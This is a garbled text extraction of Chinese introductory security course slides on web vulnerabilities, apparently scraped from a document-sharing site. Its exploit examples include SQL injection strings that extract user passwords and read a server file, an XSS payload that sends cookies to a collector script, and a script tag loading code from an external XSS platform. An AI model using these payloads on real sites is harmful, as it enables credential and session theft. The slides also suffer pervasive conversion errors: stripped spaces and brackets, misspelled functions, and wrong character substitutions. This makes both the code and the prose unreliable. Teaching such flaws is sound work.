04.安全攻防实践课程[初](漏洞原理与挖掘).pptx

04.安全攻防实践课程[初](漏洞原理与挖掘).pptx

  1. 1、本文档共21页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多

漏洞原理与挖掘;课程内容;课程内容;漏洞在哪里?

程序接受数据可能来源于未经验证的用户,网络连接和其他不受信任的来源,?如果未对?程序接受数据进行校验,那么可能会引发平安问题。

怎么发现它,肿么办?

你是不是高薪聘请了测试人员,但无法发现平安漏洞?

你是不是需要专业的平安测试人员?

其实平安很简单,了解原理,做到编码标准,然后审查重点可以防止多数漏洞,本教程将会介绍各类平安测试与编码知识。;课程内容;这个漏洞是现在应用最广泛,杀伤力也很大的漏洞,可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严谨所造成的,可以得到管理员的帐号密码等相关资料。;漏洞利用代码:

1and1=2unionselectversoin(),passwordfromusers

1and1=2unionselectconcat(user_id,0x3a,user),passwordfromusers

1and1=2unionselectload_file(0x633A5C626F6F742E696E69),passwordfromusers

;众所周知,网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”〔CrossSiteScripting,平安专家们通常将其缩写成XSS〕的威胁,而静态站点那么完全不受其影响。;漏洞利用代码:

scriptdocument.location=://localhost/security/4/get.php?cookie=%2Bdocument.cookie;/script

scriptsrc=://newxss.sinaapp/?u=974113/script;由于开发人员编写源码,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造语句提交,并交由效劳器端执行。命令注入攻击中WEB效劳器没有过滤类似system(),eval(),exec()等函数是该漏洞攻击成功的最主要原因。;漏洞利用代码:

Eval()

;效劳器通过语言的特性〔函数〕去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,可以构造这个恶意文件来到达邪恶的目的。;漏洞利用代码

Fileinclude.php?file=test.php

Fileinclude.php_filegetcontents.php?uri=../../test.php;这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。

导致该漏洞的原因在于代码作者没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改正的数据绕过扩展名的检验。;?不可信变量+危险函数

?变量传递过程

?函数处理过程

e.g.

上传——上传漏洞

数据存储与查询—SQL注入

后台或者api接口——平安认证绕过

其他因素:操作系统,web效劳器,PHP版本;课程内容;;代码执行挖掘;;上传漏洞挖掘;

文档评论(0)

liuzhouzhong + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档